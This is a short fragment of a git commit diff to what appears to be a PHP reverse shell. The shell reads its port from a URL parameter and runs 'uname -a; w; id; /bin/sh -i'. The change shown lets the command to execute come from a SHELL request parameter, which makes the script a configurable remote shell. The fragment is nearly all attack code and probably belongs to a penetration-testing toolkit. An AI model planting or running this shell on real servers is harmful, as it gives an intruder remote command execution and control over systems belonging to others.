This commit is contained in:
2023-11-26 14:10:54 +01:00
parent 309b27e330
commit 17455af5f2
10 changed files with 206 additions and 177 deletions

View File

@@ -51,7 +51,7 @@ $port = intval($_GET["LPORT"]);
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$shell = $_GET["SHELL"] ?? 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;